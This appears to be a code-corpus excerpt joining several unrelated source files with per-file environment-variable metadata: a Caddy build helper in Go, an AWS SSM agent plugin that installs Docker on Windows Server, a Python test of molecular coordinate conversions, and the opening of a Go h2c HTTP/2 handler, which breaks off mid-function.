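// Illustrative usage sketch (not part of the original file; the Caddy version
// and plugin module below are hypothetical placeholders):
//
//	b := Builder{
//		CaddyVersion: "v2.4.6",
//		Plugins: []Dependency{
//			{PackagePath: "github.com/example/caddy-plugin", Version: "v1.0.0"},
//		},
//	}
//	if err := b.Build(context.Background(), "./caddy"); err != nil {
//		log.Fatal(err)
//	}
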
// setEnv sets an environment variable-value pair in
// env, overriding an existing variable if it already
// exists. The env slice is one such as is returned
// by os.Environ(), and set must also have the form
// of key=value.
func setEnv(env []string, set string) []string {
parts := strings.SplitN(set, "=", 2)
key := parts[0]
for i := 0; i < len(env); i++ {
if strings.HasPrefix(env[i], key+"=") {
env[i] = set
return env
}
}
return append(env, set)
}
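// For example (an illustrative sketch, not in the original source):
//
//	env := []string{"GOOS=linux", "CGO_ENABLED=0"}
//	env = setEnv(env, "GOOS=darwin") // replaces the existing GOOS entry in place
//	env = setEnv(env, "GOARM=7")     // appended, since no GOARM entry exists yet
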
// Dependency pairs a Go module path with a version.
type Dependency struct {
// The name (import path) of the Go package. If at a version > 1,
// it should contain semantic import version (i.e. "/v2").
// Used with `go get`.
PackagePath string `json:"module_path,omitempty"`
// The version of the Go module, as used with `go get`.
Version string `json:"version,omitempty"`
}
// ReplacementPath represents an old or new path component
// within a Go module replacement directive.
type ReplacementPath string
// Param reformats a go.mod replace directive to be
// compatible with the `go mod edit` command.
func (r ReplacementPath) Param() string {
return strings.Replace(string(r), " ", "@", 1)
}
func (r ReplacementPath) String() string { return string(r) }
// Replace represents a Go module replacement.
type Replace struct {
// The import path of the module being replaced.
Old ReplacementPath `json:"old,omitempty"`
// The path to the replacement module.
New ReplacementPath `json:"new,omitempty"`
}
// NewReplace creates a new instance of Replace provided old and
// new Go module paths
func NewReplace(old, new string) Replace {
return Replace{
Old: ReplacementPath(old),
New: ReplacementPath(new),
}
}
// newTempFolder creates a new folder in a temporary location.
// It is the caller's responsibility to remove the folder when finished.
func newTempFolder() (string, error) {
var parentDir string
if runtime.GOOS == "darwin" {
// After upgrading to macOS High Sierra, Caddy builds mysteriously
// started missing the embedded version information that -ldflags
// was supposed to produce. But it only happened on macOS after
// upgrading to High Sierra, and it didn't happen with the usual
// `go run build.go` -- only when using a buildenv. Bug in git?
// Nope. Not a bug in Go 1.10 either. Turns out it's a breaking
// change in macOS High Sierra. When the GOPATH of the buildenv
// was set to some other folder, like in the $HOME dir, it worked
// fine. Only within $TMPDIR it broke. The $TMPDIR folder is inside
// /var, which is symlinked to /private/var, which is mounted
// with noexec. I don't understand why, but evidently that
// makes -ldflags of `go build` not work. Bizarre.
// The solution, I guess, is to just use our own "temp" dir
// outside of /var. Sigh... as long as it still gets cleaned up,
// I guess it doesn't matter too much.
// See: https://github.com/caddyserver/caddy/issues/2036
// and https://twitter.com/mholt6/status/978345803365273600 (thread)
// (using an absolute path prevents problems later when removing this
// folder if the CWD changes)
var err error
parentDir, err = filepath.Abs(".")
if err != nil {
return "", err
}
}
ts := time.Now().Format(yearMonthDayHourMin)
return ioutil.TempDir(parentDir, fmt.Sprintf("buildenv_%s.", ts))
}
// versionedModulePath helps enforce Go Module's Semantic Import Versioning (SIV) by
// returning the form of modulePath with the major component of moduleVersion added,
// if > 1. For example, inputs of "foo" and "v1.0.0" will return "foo", but inputs
// of "foo" and "v2.0.0" will return "foo/v2", for use in Go imports and go commands.
// Inputs that conflict, like "foo/v2" and "v3.1.0" are an error. This function
// returns the input if the moduleVersion is not a valid semantic version string.
// If moduleVersion is empty string, the input modulePath is returned without error.
func versionedModulePath(modulePath, moduleVersion string) (string, error) {
if moduleVersion == "" {
return modulePath, nil
}
ver, err := semver.StrictNewVersion(strings.TrimPrefix(moduleVersion, "v"))
if err != nil {
// only return the error if we know they were trying to use a semantic version
// (could have been a commit SHA or something)
if strings.HasPrefix(moduleVersion, "v") {
return "", fmt.Errorf("%s: %v", moduleVersion, err)
}
return modulePath, nil
}
major := ver.Major()
// see if the module path has a major version at the end (SIV)
matches := moduleVersionRegexp.FindStringSubmatch(modulePath)
if len(matches) == 2 {
modPathVer, err := strconv.Atoi(matches[1])
if err != nil {
return "", fmt.Errorf("this error should be impossible, but module path %s has bad version: %v", modulePath, err)
}
if modPathVer != int(major) {
return "", fmt.Errorf("versioned module path (%s) and requested module major version (%d) diverge", modulePath, major)
}
} else if major > 1 {
modulePath += fmt.Sprintf("/v%d", major)
}
return path.Clean(modulePath), nil
}
var moduleVersionRegexp = regexp.MustCompile(`.+/v(\d+)$`)
const (
// yearMonthDayHourMin is the date format
// used for temporary folder paths.
yearMonthDayHourMin = "2006-01-02-1504"
defaultCaddyModulePath = "github.com/caddyserver/caddy"
)
|
[
"\"GOOS\"",
"\"GOARCH\"",
"\"GOARM\""
] |
[] |
[
"GOARCH",
"GOOS",
"GOARM"
] |
[]
|
["GOARCH", "GOOS", "GOARM"]
|
go
| 3 | 0 | |
agent/plugins/configurecontainers/windowscontainerutil/windowscontainerutil.go
|
// Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License"). You may not
// use this file except in compliance with the License. A copy of the
// License is located at
//
// http://aws.amazon.com/apache2.0/
//
// or in the "license" file accompanying this file. This file is distributed
// on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
// either express or implied. See the License for the specific language governing
// permissions and limitations under the License.
// Package windowscontainerutil implements the install and uninstall steps on Windows for the configurecontainers plugin.
package windowscontainerutil
import (
"errors"
"fmt"
"os"
"strings"
"time"
"github.com/aws/amazon-ssm-agent/agent/appconfig"
"github.com/aws/amazon-ssm-agent/agent/context"
"github.com/aws/amazon-ssm-agent/agent/contracts"
"github.com/aws/amazon-ssm-agent/agent/fileutil"
"github.com/aws/amazon-ssm-agent/agent/fileutil/artifact"
"github.com/aws/amazon-ssm-agent/agent/framework/processor/executer/iohandler"
"github.com/aws/amazon-ssm-agent/agent/plugins/pluginutil"
)
const (
DOCKER_DOWNLOAD_URL = "https://download.docker.com/components/engine/windows-server/cs-1.12/docker.zip"
DOCKER_UNCOMPRESS_DIRECTORY = "C:\\Program Files"
DOCKER_INSTALLED_DIRECTORY = DOCKER_UNCOMPRESS_DIRECTORY + "\\docker"
)
func RunInstallCommands(context context.T, orchestrationDirectory string, out iohandler.IOHandler) {
var err error
var command string
var platformVersion string
var parameters []string
var requireReboot bool
var isNanoServer bool
var output string
log := context.Log()
platformVersion, err = dep.PlatformVersion(log)
if err != nil {
log.Error("Error detecting platform version", err)
out.MarkAsFailed(fmt.Errorf("Error detecting platform version: %v", err))
return
}
log.Debug("Platform Version:", platformVersion)
if !strings.HasPrefix(platformVersion, "10") {
out.MarkAsFailed(errors.New("ConfigureDocker is only supported on Microsoft Windows Server 2016."))
return
}
isNanoServer, err = dep.IsPlatformNanoServer(log)
if err != nil {
log.Error("Error detecting if Nano Server", err)
out.MarkAsFailed(fmt.Errorf("Error detecting if Nano Server: %v", err))
return
}
if isNanoServer {
command = "(Get-PackageProvider -ListAvailable).Name"
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 120, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error getting package providers", err)
out.MarkAsFailed(fmt.Errorf("Error getting package providers: %v", err))
return
}
log.Debug("Get-PackageProvider output:", output)
packageInstalled := strings.Contains(output, "NanoServerPackage")
if !packageInstalled {
out.AppendInfo("Installing Nano Server package provider.")
command = `Install-PackageProvider -Name Nuget -MinimumVersion 2.8.5.201 -Force`
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 60, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error installing Nuget package provider", err)
out.MarkAsFailed(fmt.Errorf("Error installing Nuget package provider: %v", err))
return
}
log.Debug("Install Package provider output:", output)
command = `Save-Module -Path "$env:programfiles\WindowsPowerShell\Modules\" -Name NanoServerPackage -minimumVersion 1.0.1.0`
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 60, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error saving module", err)
out.MarkAsFailed(fmt.Errorf("Error saving Nano server package: %v", err))
return
}
log.Debug("Save-Module output:", output)
command = `Import-PackageProvider NanoServerPackage`
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 30, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error importing package", err)
out.MarkAsFailed(fmt.Errorf("Error importing package: %v", err))
return
}
log.Debug("Import-PackageProvider output:", output)
}
//Install containers package
command = "(Get-Package -providername NanoServerPackage).Name"
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 30, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error getting microsoft-nanoserver-containers-package", err)
out.MarkAsFailed(fmt.Errorf("Error getting microsoft-nanoserver-containers-package: %v", err))
return
}
log.Debug("Get-Package output:", output)
packageInstalled = strings.Contains(output, "Microsoft-NanoServer-Containers-Package")
if !packageInstalled {
out.AppendInfo("Installing containers package.")
command = "Install-NanoServerPackage microsoft-nanoserver-containers-package"
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 30, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error installing microsoft-nanoserver-containers-package", err)
out.MarkAsFailed(fmt.Errorf("Error installing microsoft-nanoserver-containers-package: %v", err))
return
}
log.Debug("Install-NanoServerPackage output:", output)
requireReboot = true
}
} else {
//install windows containers feature
command = "(Get-WindowsFeature -Name containers).Installed"
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 30, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error getting containers feature", err)
out.MarkAsFailed(fmt.Errorf("Error getting containers feature: %v", err))
return
}
log.Debug("Get-WindowsFeature output:", output)
packageInstalled := strings.Contains(output, "True")
if !packageInstalled {
out.AppendInfo("Installing Windows containers feature.")
command = "(Install-WindowsFeature -Name containers).RestartNeeded"
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 30, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error installing Windows containers feature", err)
out.MarkAsFailed(fmt.Errorf("Error installing Windows containers feature: %v", err))
return
}
log.Debug("Install-WindowsFeature output:", output)
requireReboot = strings.Contains(output, "Yes")
}
}
//Create docker config if it does not exist
daemonConfigPath := os.Getenv("ProgramData") + "\\docker\\config\\daemon.json"
daemonConfigContent := `
{
"fixed-cidr": "172.17.0.0/16"
}
`
if err := dep.SetDaemonConfig(daemonConfigPath, daemonConfigContent); err != nil {
log.Error("Error writing Docker daemon config file", err)
out.MarkAsFailed(fmt.Errorf("Error writing Docker daemon config file: %v", err))
return
}
//Download docker
var downloadOutput artifact.DownloadOutput
downloadOutput, err = dep.ArtifactDownload(context, artifact.DownloadInput{SourceURL: DOCKER_DOWNLOAD_URL, DestinationDirectory: appconfig.DownloadRoot})
if err != nil {
log.Errorf("failed to download file from %v: %v", DOCKER_DOWNLOAD_URL, err)
return
}
log.Debugf("Zip file downloaded to %v", downloadOutput.LocalFilePath)
_, installedErr := os.Stat(DOCKER_INSTALLED_DIRECTORY)
if downloadOutput.IsUpdated || installedErr != nil {
out.AppendInfo("Unzipping Docker to program files directory.")
//uncompress docker zip
fileutil.Uncompress(log, downloadOutput.LocalFilePath, DOCKER_UNCOMPRESS_DIRECTORY)
}
// delete downloaded file, if it exists
pluginutil.CleanupFile(log, downloadOutput.LocalFilePath)
//Set this process's path environment variable to include Docker
if !strings.Contains(strings.ToLower(os.Getenv("path")), strings.ToLower(DOCKER_INSTALLED_DIRECTORY)) {
out.AppendInfo("Setting process path variable to include docker directory")
//set envvariable for this process
os.Setenv("path", DOCKER_INSTALLED_DIRECTORY+";"+os.Getenv("path"))
}
log.Debug("Path set to ", os.Getenv("path"))
//set path env variable for machine to include Docker
var currentSystemPathValue string
currentSystemPathValue, _, err = dep.LocalRegistryKeyGetStringValue(`System\CurrentControlSet\Control\Session Manager\Environment`, "Path")
if err != nil {
log.Error("Error getting current machine registry key value", err)
out.MarkAsFailed(fmt.Errorf("Error getting current machine registry key value: %v", err))
return
}
log.Debug("System Path set to ", currentSystemPathValue)
if !strings.Contains(strings.ToLower(currentSystemPathValue), strings.ToLower(DOCKER_INSTALLED_DIRECTORY)) {
out.AppendInfo("Setting machine path variable to include docker directory")
command = "setx"
parameters = []string{"-m", "path", os.Getenv("path")}
var setPathOutput string
setPathOutput, err = dep.UpdateUtilExeCommandOutput(context, 10, log, command, parameters, "", "", "", "", false)
if err != nil {
log.Error("Error setting machine path environment variable", err)
out.MarkAsFailed(fmt.Errorf("Error setting machine path environment variable: %v", err))
return
}
log.Debug("setx path output:", setPathOutput)
}
//reboot if needed
if requireReboot {
out.AppendInfo("Rebooting machine to complete install")
log.Debug("require reboot is true")
out.SetStatus(contracts.ResultStatusSuccessAndReboot)
return
}
//Check if docker daemon registered
var dockerServiceStatusOutput string
command = "(Get-Service docker).Status"
parameters = make([]string, 0)
dockerServiceStatusOutput, err = dep.UpdateUtilExeCommandOutput(context, 120, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error getting Docker service status", err)
out.MarkAsFailed(fmt.Errorf("Error getting Docker service status: %v", err))
return
}
log.Debug("Get-Service output:", dockerServiceStatusOutput)
ServiceRunning := strings.HasPrefix(dockerServiceStatusOutput, "Running")
//Register Service
if len(strings.TrimSpace(dockerServiceStatusOutput)) == 0 {
out.AppendInfo("Registering dockerd.")
command = `dockerd`
log.Debug("dockerd cmd:", command)
parameters = []string{"--register-service"}
dockerServiceStatusOutput, err = dep.UpdateUtilExeCommandOutput(context, 120, log, command, parameters, DOCKER_INSTALLED_DIRECTORY, "", "", "", false)
if err != nil {
log.Error("Error registering Docker service", err)
out.MarkAsFailed(fmt.Errorf("Error registering Docker service: %v", err))
return
}
log.Debug("dockerd output:", dockerServiceStatusOutput)
//set service to delayed start
out.AppendInfo("set dockerd service configuration.")
command = "sc.exe"
parameters = []string{"config", "docker", "start=delayed-auto"}
dockerServiceStatusOutput, err = dep.UpdateUtilExeCommandOutput(context, 10, log, command, parameters, "", "", "", "", false)
if err != nil {
log.Error("Error setting delayed start for Docker service", err)
out.MarkAsFailed(fmt.Errorf("Error setting delayed start for Docker service: %v", err))
return
}
log.Debug("sc output:", dockerServiceStatusOutput)
//sleep 10 sec after registering
time.Sleep(10 * time.Second)
}
err = dep.LocalRegistryKeySetDWordValue(`SYSTEM\CurrentControlSet\services\docker`, "AutoStartDelay", 240)
if err != nil {
log.Error("Error opening registry key to set Docker delayed start", err)
out.MarkAsFailed(fmt.Errorf("Error opening registry key to set Docker delayed start: %v", err))
return
}
//Start service
if !ServiceRunning {
out.AppendInfo("Starting Docker service.")
command = "Start-Service docker"
parameters = make([]string, 0)
dockerServiceStatusOutput, err = dep.UpdateUtilExeCommandOutput(context, 300, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error starting Docker service", err)
out.MarkAsFailed(fmt.Errorf("Error starting Docker service: %v", err))
return
}
log.Debug("start-service output:", dockerServiceStatusOutput)
}
out.AppendInfo("Installation complete")
log.Debug("require reboot:", requireReboot)
out.SetStatus(contracts.ResultStatusSuccess)
return
}
func RunUninstallCommands(context context.T, orchestrationDirectory string, out iohandler.IOHandler) {
var err error
var command string
var parameters []string
var requireReboot bool
var platformVersion string
var isNanoServer bool
var output string
var log = context.Log()
platformVersion, err = dep.PlatformVersion(log)
if err != nil {
log.Error("Error detecting platform version", err)
out.MarkAsFailed(fmt.Errorf("Error detecting platform version: %v", err))
return
}
log.Debug("Platform Version:", platformVersion)
if !strings.HasPrefix(platformVersion, "10") {
out.MarkAsFailed(errors.New("ConfigureDocker is only supported on Microsoft Windows Server 2016."))
return
}
//Check if docker daemon registered and running
var dockerServiceStatusOutput string
command = "(Get-Service docker).Status"
parameters = make([]string, 0)
dockerServiceStatusOutput, err = dep.UpdateUtilExeCommandOutput(context, 120, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error getting Docker service status", err)
out.MarkAsFailed(fmt.Errorf("Error getting Docker service status: %v", err))
return
}
log.Debug("Get-Service output:", dockerServiceStatusOutput)
ServiceRunning := strings.Contains(dockerServiceStatusOutput, "Running")
//Stop service
if ServiceRunning {
out.AppendInfo("Stopping Docker Service.")
command = "Stop-Service docker"
parameters = make([]string, 0)
dockerServiceStatusOutput, err = dep.UpdateUtilExeCommandOutput(context, 180, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error stopping Docker service", err)
out.MarkAsFailed(fmt.Errorf("Error stopping Docker service: %v", err))
return
}
log.Debug("stop-service output:", dockerServiceStatusOutput)
}
//Unregister Service
if len(strings.TrimSpace(dockerServiceStatusOutput)) > 0 {
out.AppendInfo("Unregistering dockerd service.")
command = "(Get-WmiObject -Class Win32_Service -Filter \"Name='docker'\").delete()"
parameters = make([]string, 0)
dockerServiceStatusOutput, err = dep.UpdateUtilExeCommandOutput(context, 120, log, command, parameters, DOCKER_INSTALLED_DIRECTORY, "", "", "", true)
if err != nil {
log.Error("Error unregistering Docker service", err)
out.MarkAsFailed(fmt.Errorf("Error unregistering Docker service: %v", err))
return
}
log.Debug("dockerd output:", dockerServiceStatusOutput)
}
//Remove docker directory
if _, err := os.Stat(DOCKER_INSTALLED_DIRECTORY); err == nil {
out.AppendInfo("Removing Docker directory.")
os.RemoveAll(DOCKER_INSTALLED_DIRECTORY)
}
//check if Nano
isNanoServer, err = dep.IsPlatformNanoServer(log)
if err != nil {
log.Error("Error detecting if Nano Server", err)
out.MarkAsFailed(fmt.Errorf("Error detecting if Nano Server: %v", err))
return
}
if isNanoServer {
out.AppendInfo("Removing packages from Nano server not currently supported.")
} else {
//uninstall windows containers feature
command = "(Get-WindowsFeature -Name containers).Installed"
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 50, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error getting containers feature", err)
out.MarkAsFailed(fmt.Errorf("Error getting containers feature: %v", err))
return
}
log.Debug("Get-WindowsFeature output:", output)
packageInstalled := strings.Contains(output, "True")
if packageInstalled {
out.AppendInfo("Uninstalling containers Windows feature.")
command = "(Uninstall-WindowsFeature -Name containers).RestartNeeded"
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 300, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error uninstalling containers Windows feature", err)
out.MarkAsFailed(fmt.Errorf("Error uninstalling containers Windows feature: %v", err))
return
}
log.Debug("Uninstall-WindowsFeature output:", output)
requireReboot = strings.Contains(output, "Yes")
log.Debug("Requireboot:", requireReboot)
}
//reboot if needed
if requireReboot {
out.AppendInfo("Rebooting machine to complete install")
log.Debug("require reboot is true", requireReboot)
out.SetStatus(contracts.ResultStatusSuccessAndReboot)
return
}
}
out.AppendInfo("Uninstallation complete.")
log.Debug("Uninstallation complete")
out.SetStatus(contracts.ResultStatusSuccess)
return
}
|
[
"\"ProgramData\"",
"\"path\"",
"\"path\"",
"\"path\"",
"\"path\""
] |
[] |
[
"ProgramData",
"path"
] |
[]
|
["ProgramData", "path"]
|
go
| 2 | 0 | |
perses/tests/test_coordinate_numba.py
|
import simtk.openmm as openmm
import openmoltools
import simtk.openmm.app as app
import simtk.unit as unit
import logging
import numpy as np
import parmed
import copy
import os
from unittest import skipIf
from pkg_resources import resource_filename
from openmmtools.constants import kB
from perses.rjmc import coordinate_numba
from perses.rjmc.geometry import check_dimensionality
from perses.tests.test_geometry_engine import _get_internal_from_omm
################################################################################
# Global parameters
################################################################################
temperature = 300.0 * unit.kelvin # unit-bearing temperature
kT = kB * temperature # unit-bearing thermal energy
beta = 1.0/kT # unit-bearing inverse thermal energy
CARBON_MASS = 12.01 # float (implicitly in units of AMU)
REFERENCE_PLATFORM = openmm.Platform.getPlatformByName("Reference")
running_on_github_actions = os.environ.get('GITHUB_ACTIONS', None) == 'true'
#########################################
# Tests
#########################################
def test_coordinate_conversion():
"""
test that the `_internal_to_cartesian` and `_cartesian_to_internal` functions in `geometry.py` convert with correct
dimensionality and within an error of 1e-12 for random inputs
"""
import perses.rjmc.geometry as geometry
geometry_engine = geometry.FFAllAngleGeometryEngine({'test': 'true'})
#try to transform random coordinates to and from cartesian
for i in range(200):
indices = np.random.randint(100, size=4)
atom_position = unit.Quantity(np.array([ 0.80557722 ,-1.10424644 ,-1.08578826]), unit=unit.nanometers)
bond_position = unit.Quantity(np.array([ 0.0765, 0.1 , -0.4005]), unit=unit.nanometers)
angle_position = unit.Quantity(np.array([ 0.0829 , 0.0952 ,-0.2479]) ,unit=unit.nanometers)
torsion_position = unit.Quantity(np.array([-0.057 , 0.0951 ,-0.1863] ) ,unit=unit.nanometers)
rtp, detJ = geometry_engine._cartesian_to_internal(atom_position, bond_position, angle_position, torsion_position)
# Check internal coordinates do not have units
r, theta, phi = rtp
assert isinstance(r, float)
assert isinstance(theta, float)
assert isinstance(phi, float)
# Check that we can reproduce original unit-bearing positions
xyz, _ = geometry_engine._internal_to_cartesian(bond_position, angle_position, torsion_position, r, theta, phi)
assert check_dimensionality(xyz, unit.nanometers)
assert np.linalg.norm(xyz-atom_position) < 1.0e-12
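# A minimal sketch of the round trip exercised above (names as used in the test;
# the tolerance is the 1e-12 nm bound asserted above):
#
#   (r, theta, phi), detJ = geometry_engine._cartesian_to_internal(
#       atom_position, bond_position, angle_position, torsion_position)
#   xyz, _ = geometry_engine._internal_to_cartesian(
#       bond_position, angle_position, torsion_position, r, theta, phi)
#   # xyz should reproduce atom_position to within ~1e-12 nm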
def test_openmm_dihedral():
"""
Test FFAllAngleGeometryEngine _internal_to_cartesian and _cartesian_to_internal are consistent with OpenMM torsion angles.
"""
TORSION_TOLERANCE = 1.0e-4 # permitted disagreement in torsions
# Create geometry engine
from perses.rjmc import geometry
geometry_engine = geometry.FFAllAngleGeometryEngine({'test': 'true'})
# Create a four-bead test system with a single custom force that measures the OpenMM torsion
import simtk.openmm as openmm
integrator = openmm.VerletIntegrator(1.0*unit.femtoseconds)
sys = openmm.System()
force = openmm.CustomTorsionForce("theta")
for i in range(4):
sys.addParticle(1.0*unit.amu)
force.addTorsion(0,1,2,3,[])
sys.addForce(force)
positions = unit.Quantity(np.array([
[0.10557722, -1.10424644, -1.08578826],
[0.0765, 0.1, -0.4005],
[0.0829, 0.0952, -0.2479],
[-0.057, 0.0951, -0.1863],
]), unit.nanometers)
atom_position = positions[0,:]
bond_position = positions[1,:]
angle_position = positions[2,:]
torsion_position = positions[3,:]
#atom_position = unit.Quantity(np.array([ 0.10557722 ,-1.10424644 ,-1.08578826]), unit=unit.nanometers)
#bond_position = unit.Quantity(np.array([ 0.0765, 0.1 , -0.4005]), unit=unit.nanometers)
#angle_position = unit.Quantity(np.array([ 0.0829 , 0.0952 ,-0.2479]) ,unit=unit.nanometers)
#torsion_position = unit.Quantity(np.array([-0.057 , 0.0951 ,-0.1863] ) ,unit=unit.nanometers)
# Compute the dimensionless internal coordinates consistent with this geometry
rtp, detJ = geometry_engine._cartesian_to_internal(atom_position, bond_position, angle_position, torsion_position)
(r, theta, phi) = rtp # dimensionless internal coordinates
# Create a reference context
platform = openmm.Platform.getPlatformByName("Reference")
context = openmm.Context(sys, integrator, platform)
context.setPositions([atom_position, bond_position, angle_position, torsion_position])
openmm_phi = context.getState(getEnergy=True).getPotentialEnergy()/unit.kilojoule_per_mole # this system converts torsion radians -> kJ/mol
assert np.linalg.norm(openmm_phi - phi) < TORSION_TOLERANCE, '_cartesian_to_internal and OpenMM disagree on torsions'
# Test _internal_to_cartesian by rotating around the torsion
n_divisions = 100
phis = np.arange(-np.pi, np.pi, (2.0*np.pi)/n_divisions) # _internal_to_cartesian only accepts dimensionless quantities
for i, phi in enumerate(phis):
# Note that (r, theta, phi) are dimensionless here
xyz_atom1, _ = geometry_engine._internal_to_cartesian(bond_position, angle_position, torsion_position, r, theta, phi)
positions[0,:] = xyz_atom1
context.setPositions(positions)
openmm_phi = context.getState(getEnergy=True).getPotentialEnergy()/unit.kilojoule_per_mole # this system converts torsion radians -> kJ/mol
msg = '_internal_to_cartesian and OpenMM disagree on torsions: \n'
msg += '_internal_to_cartesian generated positions for: {}\n'.format(phi)
msg += 'OpenMM: {}\n'.format(openmm_phi)
msg += 'positions: {}'.format(positions)
assert np.linalg.norm(openmm_phi - phi) < TORSION_TOLERANCE, msg
# Check that _cartesian_to_internal agrees
rtp, detJ = geometry_engine._cartesian_to_internal(xyz_atom1, bond_position, angle_position, torsion_position)
assert np.linalg.norm(phi - rtp[2]) < TORSION_TOLERANCE, '_internal_to_cartesian disagrees with _cartesian_to_internal'
# Clean up
del context
def test_try_random_itoc():
"""
test whether a perturbed four-atom system gives the same internal and cartesian coords when recomputed with `_internal_to_cartesian`
and `_cartesian_to_internal` as compared to the values output by `_get_internal_from_omm`
"""
import perses.rjmc.geometry as geometry
geometry_engine = geometry.FFAllAngleGeometryEngine({'test': 'true'})
import simtk.openmm as openmm
integrator = openmm.VerletIntegrator(1.0*unit.femtoseconds)
sys = openmm.System()
force = openmm.CustomTorsionForce("theta")
for i in range(4):
sys.addParticle(1.0*unit.amu)
force.addTorsion(0,1,2,3,[])
sys.addForce(force)
atom_position = unit.Quantity(np.array([ 0.10557722 ,-1.10424644 ,-1.08578826]), unit=unit.nanometers)
bond_position = unit.Quantity(np.array([ 0.0765, 0.1 , -0.4005]), unit=unit.nanometers)
angle_position = unit.Quantity(np.array([ 0.0829 , 0.0952 ,-0.2479]) ,unit=unit.nanometers)
torsion_position = unit.Quantity(np.array([-0.057 , 0.0951 ,-0.1863] ) ,unit=unit.nanometers)
for i in range(1000):
atom_position += unit.Quantity(np.random.normal(size=3), unit=unit.nanometers)
r, theta, phi = _get_internal_from_omm(atom_position, bond_position, angle_position, torsion_position)
recomputed_xyz, _ = geometry_engine._internal_to_cartesian(bond_position, angle_position, torsion_position, r, theta, phi)
new_r, new_theta, new_phi = _get_internal_from_omm(recomputed_xyz,bond_position, angle_position, torsion_position)
TOLERANCE = 1e-10
difference = np.linalg.norm(np.array(atom_position/unit.nanometers) - np.array(recomputed_xyz/unit.nanometers))
assert difference < TOLERANCE, f"the norm of the difference in positions recomputed with original cartesians ({difference}) is greater than tolerance of {TOLERANCE}"
difference = np.linalg.norm(np.array([r, theta, phi]) - np.array([new_r, new_theta, new_phi]))
assert difference < TOLERANCE, f"the norm of the difference in internals recomputed with original sphericals ({difference}) is greater than tolerance of {TOLERANCE}"
|
[] |
[] |
[
"GITHUB_ACTIONS"
] |
[]
|
["GITHUB_ACTIONS"]
|
python
| 1 | 0 | |
http2/h2c/h2c.go
|
// Copyright 2018 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Package h2c implements the unencrypted "h2c" form of HTTP/2.
//
// The h2c protocol is the non-TLS version of HTTP/2 which is not available from
// net/http or github.com/Kuraaa/net/http2.
package h2c
import (
"bufio"
"bytes"
"encoding/base64"
"encoding/binary"
"errors"
"fmt"
"io"
"log"
"net"
"net/http"
"net/textproto"
"os"
"strings"
"github.com/Kuraaa/net/http/httpguts"
"github.com/Kuraaa/net/http2"
"github.com/Kuraaa/net/http2/hpack"
)
var (
http2VerboseLogs bool
)
func init() {
e := os.Getenv("GODEBUG")
if strings.Contains(e, "http2debug=1") || strings.Contains(e, "http2debug=2") {
http2VerboseLogs = true
}
}
// h2cHandler is a Handler which implements h2c by hijacking the HTTP/1 traffic
// that should be h2c traffic. There are two ways to begin a h2c connection
// (RFC 7540 Section 3.2 and 3.4): (1) Starting with Prior Knowledge - this
// works by starting an h2c connection with a string of bytes that is valid
// HTTP/1, but unlikely to occur in practice and (2) Upgrading from HTTP/1 to
// h2c - this works by using the HTTP/1 Upgrade header to request an upgrade to
// h2c. When either of those situations occur we hijack the HTTP/1 connection,
// convert it to a HTTP/2 connection and pass the net.Conn to http2.ServeConn.
type h2cHandler struct {
Handler http.Handler
s *http2.Server
}
// NewHandler returns an http.Handler that wraps h, intercepting any h2c
// traffic. If a request is an h2c connection, it's hijacked and redirected to
// s.ServeConn. Otherwise the returned Handler just forwards requests to h. This
// works because h2c is designed to be parseable as valid HTTP/1, but ignored by
// any HTTP server that does not handle h2c. Therefore we leverage the HTTP/1
// compatible parts of the Go http library to parse and recognize h2c requests.
// Once a request is recognized as h2c, we hijack the connection and convert it
// to an HTTP/2 connection which is understandable to s.ServeConn. (s.ServeConn
// understands HTTP/2 except for the h2c part of it.)
func NewHandler(h http.Handler, s *http2.Server) http.Handler {
return &h2cHandler{
Handler: h,
s: s,
}
}
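// Illustrative usage sketch (not part of this file; the listen address and
// handler body are placeholders):
//
//	h2s := &http2.Server{}
//	handler := NewHandler(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
//		fmt.Fprintf(w, "Hello, %s, proto %s", r.RemoteAddr, r.Proto)
//	}), h2s)
//	log.Fatal(http.ListenAndServe(":8080", handler))
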
// ServeHTTP implements the h2c support that is enabled by h2c.NewHandler.
func (s h2cHandler) ServeHTTP(w http.ResponseWriter, r *http.Request) {
// Handle h2c with prior knowledge (RFC 7540 Section 3.4)
if r.Method == "PRI" && len(r.Header) == 0 && r.URL.Path == "*" && r.Proto == "HTTP/2.0" {
if http2VerboseLogs {
log.Print("h2c: attempting h2c with prior knowledge.")
}
conn, err := initH2CWithPriorKnowledge(w)
if err != nil {
if http2VerboseLogs {
log.Printf("h2c: error h2c with prior knowledge: %v", err)
}
return
}
defer conn.Close()
s.s.ServeConn(conn, &http2.ServeConnOpts{
Context: r.Context(),
Handler: s.Handler,
})
return
}
// Handle Upgrade to h2c (RFC 7540 Section 3.2)
if conn, err := h2cUpgrade(w, r); err == nil {
defer conn.Close()
